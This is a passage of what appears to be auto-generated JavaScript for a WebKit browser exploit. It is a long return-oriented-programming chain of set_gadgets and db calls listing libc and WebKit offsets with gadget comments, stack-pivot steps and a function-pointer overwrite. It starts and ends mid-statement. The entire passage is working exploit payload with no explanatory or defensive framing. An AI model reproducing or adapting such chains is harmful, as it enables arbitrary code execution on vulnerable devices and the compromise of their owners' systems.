rax, rcx libc_base+763368 //pop rcx ]); //L1894: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+139184, //L1897 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1897: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+139240, //L1898 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1898: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+139384, //L1902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+139368, //L1901 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1900: db([56, 0]); // 0x38 set_gadget(webkit_base+3236123,); //pop r9 //L1901: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1902: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+139504, //L1903 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+139536, //L1905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+139520, //L1904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L1903: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1904: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1905: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+139640, //L1906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+139656, //L1907 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1906: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1907: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+139776, //L1908 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+139760, //L1909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1909: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1908: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+141248, //L1910 //L1848: libc_base+764760, //pop rsi ropchain+139840, //L1911 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1911: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1913: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+139960, //L1916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+139944, //L1914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1914: 
db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1916: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+140104, //L1919 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+140072, //L1917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+140088, //L1918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1917: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1918: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1919: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+140184, //L1920 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1920: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1922: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+140304, //L1925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+140288, //L1923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1923: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1925: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+140480, //L1928 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+140496, //L1929 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+140448, //L1926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+140464, //L1927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1926: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L1927: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1928: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1929: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+140592, //L1931 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+140576, //L1930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1930: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1931: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L1933: ropchain+140696, //L1932 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+141576, //L1934 //L1932: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+140840, //L1936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+140856, //L1937 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+140824, //L1935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L1935: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1936: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1937: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+140968, //L1938 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141000, //L1940 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+140984, //L1939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1938: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1939: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1940: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+141104, //L1941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141120, //L1942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1941: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1942: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+141240, //L1943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141224, //L1944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1944: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1943: db([0, 0]); // 0x0 //L1910: set_gadgets([ libc_base+764760, //pop rsi ropchain+141328, //L1946 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+141312, //L1945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+144605 //pop rdi ]); //L1945: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1946: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+141432, //L1947 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141448, //L1948 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1947: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1948: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+141568, //L1949 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+141552, //L1950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1950: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1949: db([0, 0]); // 0x0 //L1934: set_gadget(libc_base+764760,); //pop rsi db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+1438842, //pop rdx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov 
rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+3236123, //pop r9 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+756281, //xor rax, rax libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+11, //nop libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+764760, //pop rsi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+763368, //pop rcx libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+144605, //pop rdi libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax webkit_base+568675, //pop r8 libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax libc_base+782311, //pop rsp libc_base+426295, //mov [rdi], rax libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([208, 0]); // 0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967080, 4294967295]); // -0xd8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([200, 0]); // 0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967088, 4294967295]); // -0xd0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([192, 0]); // 0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967096, 4294967295]); // -0xc8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([184, 0]); // 0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967104, 4294967295]); // -0xc0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([176, 0]); // 0xb0 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967112, 4294967295]); // -0xb8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([168, 0]); // 0xa8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax 
libc_base+764760 //pop rsi ]); db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ webkit_base+14664103, //and rax, rcx libc_base+763368, //pop rcx __swbuf_addr, webkit_base+20307877, //mov [rax], rcx libc_base+764760 //pop rsi ]); db([4294967192, 4294967295]); // -0x68 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([48, 0]); // 0x30 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([4294967280, 4294967295]); // -0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+731401, //mov rax, r8 libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([32, 0]); // 0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760 //pop rsi ]); db([24, 0]); // 0x18 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([128, 0]); // 0x80 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+142896, //L1951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+782311 //pop rsp ]); //L1951: db([0, 0]); // 0x0 //___bswap64_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+142968, //L1953 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1953: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+143064, //L1954 webkit_base+660161, //mov [rsi], rax ; mov al, 
1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+143096, //L1957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L1954: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1956: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L1957: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+143200, //L1960 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+143184, //L1958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1958: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1960: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+143312, //L1961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143344, //L1963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+143328, //L1962 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1961: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1962: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1963: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143448, //L1964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143464, //L1965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1964: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1965: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143584, //L1966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143568, //L1967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1967: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1966: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+143672, //L1969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+143656, //L1968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1969: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143776, //L1970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143792, //L1971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L1970: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1971: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143912, //L1972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+143896, //L1973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1973: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop 
rsp //L1972: db([0, 0]); // 0x0 //___bswap32_var: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+143984, //L1975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L1975: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+144080, //L1976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+144112, //L1979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+763368 //pop rcx ]); //L1976: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1978: db([16, 0]); // 0x10 set_gadget(webkit_base+568675,); //pop r8 //L1979: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+144216, //L1982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+144200, //L1980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1980: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1982: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+144392, //L1985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+144408, //L1986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+144360, //L1983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+144376, //L1984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1983: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L1984: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1985: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1986: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+144568, //L1990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+144536, //L1988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+144552, //L1989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1987: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L1988: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1989: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1990: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+144688, //L1991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+144720, //L1993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+144704, //L1992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1991: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1992: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1993: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+144824, //L1994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+144840, //L1995 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 
//pop r8 ]); //L1994: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1995: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+144960, //L1996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+144944, //L1997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L1997: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L1996: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+145048, //L1999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+145032, //L1998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L1998: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1999: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, 